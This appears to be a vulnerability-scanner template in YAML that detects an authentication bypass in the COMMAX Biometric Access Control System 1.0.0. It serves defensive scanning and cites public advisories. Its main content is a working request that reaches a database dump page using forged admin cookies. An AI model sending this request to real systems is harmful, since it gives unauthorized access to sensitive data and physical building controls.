36 lines
1.2 KiB
YAML
36 lines
1.2 KiB
YAML
id: commax-biometric-auth-bypass
|
|
|
|
info:
|
|
name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
|
|
author: gy741
|
|
severity: critical
|
|
description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50206
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
|
|
tags: commax,auth-bypass
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /db_dump.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: {{BaseURL}}/user_add.php
|
|
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "<title>::: COMMAX :::</title>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|